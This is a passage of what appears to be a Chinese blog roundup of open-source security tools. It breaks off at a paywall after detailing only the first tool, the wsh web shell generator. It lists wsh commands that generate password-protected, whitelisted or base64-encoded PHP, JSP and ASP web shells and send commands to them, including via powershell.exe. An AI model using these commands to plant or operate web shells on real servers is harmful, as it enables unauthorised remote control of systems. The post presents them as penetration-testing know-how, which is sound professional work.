本文介绍了多个网络安全领域的开源工具,包括Web Shell生成器、PacketSifter流量分析、Raider身份认证测试、智能字典生成器Elpscrk、逆向工程工具Doldrums、数据欺骗工具InveighZero、恶意软件哈希分析工具Uchihash以及IPA内存搜索修复工具Ipa-medit。这些工具涵盖了Web安全、渗透测试、逆向工程、数据欺骗等多个方面,对于网络安全专业人士极具价值。
1.Web Shell生成器和命令行接口工具
生成器使用了php、asp和jsp来创建Webshell
https://github.com/EatonChips/wsh
git clone https://github.com/EatonChips/wsh.git
wsh 127.0.0.1:8080/test.php --param cmd
wsh generate php --param cmd --no-file -o shell.php
wsh generate php --no-file --header user-agent -o shell.php
wsh 127.0.0.1:8080/shell.php --header user-agent
wsh generate php --no-file --param cmd -w 127.0.0.1,10.0.23.3 -w 12.4.22.3 -o shell.php
wsh generate php --no-file --param cmd --pass S3cr3t --pass-param pass
wsh 127.0.0.1:8080/shell.php --param cmd -P pass:S3cr3t
wsh generate php --no-file --param cmd --pass S3cr3t --pass-header pass-header
wsh 127.0.0.1:8080/shell.php --param cmd -H pass-header:S3cr3t
wsh g php --param cmd --no-file --base64
wsh g jsp --param cmd --no-file -o index.jsp
jar -cvf shell.war index.jsp
wsh http://10.0.0.27/shell.asp --param cmd --prefix powershell.exe
127.0.0.1:8080/shell.php --param cmd --log localhost.log
wsh 127.0.0.1:8080/inde
最低0.47元/天 解锁文章
扫一扫
5676
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
